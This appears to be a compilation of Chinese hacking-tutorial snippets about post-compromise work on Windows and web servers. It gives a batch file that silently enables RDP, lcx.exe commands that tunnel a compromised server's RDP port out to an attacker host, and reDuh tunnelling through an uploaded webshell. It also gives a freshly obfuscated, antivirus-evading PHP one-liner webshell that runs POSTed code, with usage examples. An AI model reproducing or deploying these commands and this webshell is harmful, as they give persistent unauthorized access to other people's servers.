一、查询远程连接的端口 1、命令查询，win7/win10/win2003都可以使用 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0xd3d转换十进制是3389 2、注册表查询 二、开启3389端口的方法 1、工具开启 2、批处理开启，将下面代码复制到bat文件，双击自行开启远程连接 echo Windows Registry Editor Version 5.00>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.regecho "fDenyTSConnections"=dword:00000000>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000d3d>>3389.regregedit /s 3389.regdel 3389.reg 三、当3389端口被修改后，如何查找 1、通过大马的读注册表、找到3389端口，然后读取 2、通过大马的cmd命令 tasklist /svc,获取termservice的pid号 再执行netstat -ano查找2684对应的的端口就是远程连接端口 3、通过工具扫描 工具下载方式：加入交流群 注意：软件均来自网络，不能保证安全性 ...

一、环境： 1、内网主机IP：192.168.1.106  win2003 2、假设外网主机ip：192.168.1.104 win7 二、通过大马上传lcx.exe到服务器内网 1、将内网3389端口转发到外网2222端口 lcx.exe -slave 192.168.1.104 2222 127.0.0.1 3389 2、在攻击机win7监听2222本地端口，转发到4444端口 lcx.exe -listen 2222 4444 3、在攻击机win7中远程连接 三、利用工具转发reDuh 1、将软件自带的脚本拷贝到服务器中，根据不同环境，选择不同脚本 2、打开reDuh，将脚本文件上传的路径填写到URL，点击start，再点击create 3、打开远程连接，这个有点缓慢，但是可以连接成功的，详细见交流群视频教程 工具下载方式：加入交流群 ...

一、访问上传的木马文件 http://192.168.1.104/1.asp 二、点击F12，打开谷歌自带的开发人员工具，点击network 三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码 四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改 注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送 ...

前言       2019年9月9日最新免杀php变种一句话，亲测过啊D，不知道什么时候加入特征库报毒，反正现在能用吧。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> 说明 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码...